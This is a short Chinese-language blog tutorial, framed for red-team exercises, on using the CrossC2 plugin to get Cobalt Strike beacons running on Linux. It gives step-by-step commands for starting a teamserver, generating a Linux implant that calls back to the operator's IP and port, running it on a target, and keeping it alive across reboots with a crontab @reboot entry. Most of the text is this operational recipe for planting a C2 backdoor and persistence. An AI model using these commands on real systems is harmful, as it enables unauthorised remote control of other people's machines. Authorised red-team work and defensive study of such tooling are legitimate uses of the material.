為獲得最佳的閱讀體驗,請訪問我的個人主頁: https://xzajyjs.cn/
在紅藍對抗中,我們常需要對目標進行長時間的控制,cobaltstrike
原生對於上線windows
比較輕鬆友好,但如果是Linux
平臺就需要用到第三方外掛了。
準備工作
這裡使用CrossC2
的外掛,類似於在linux上反彈一個cobaltstrike類的shell。
github:https://github.com/gloxec/CrossC2
下載時注意自己的cs版本(我這裡使用的是3.0.2的最新版外掛,cs版本為4.3)
需要下載以下兩個檔案:
CrossC2***.cna
、genCrossC2.Linux
由於我的木馬是在linux平臺生成的,因此使用genCrossC2.Linux,可根據自己平臺的差異自行選擇
服務端部署
cobaltstrike服務端部署
chmod +x teamserver
./teamserver [ip] [password]
客戶端連線
建立一個監聽器,需要注意的是crossc2
外掛只支援https
的beacon
安裝crossc2
生成木馬
我這裡是在服務端的cobaltstrike目錄直接生成的,如果在非服務端生成需要將服務端根目錄的隱藏檔案
.cobaltstrike.beacon_keys
複製下來放到cs根目錄
chmod +x genCrossC2.Linux
./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test
上線
在目標靶機上直接執行就可以看到上線了.
chmod +x test
./test
許可權維持
一個簡單的思想就是將其新增的系統啟動項
有很多種方法,這裡講個最簡單的,通過計劃任務的方式實現
crontab -e
@reboot /tmp/test
這樣每次重啟之後都能重新執行
這裡需要注意的是要設定以下次登入的使用者的crontab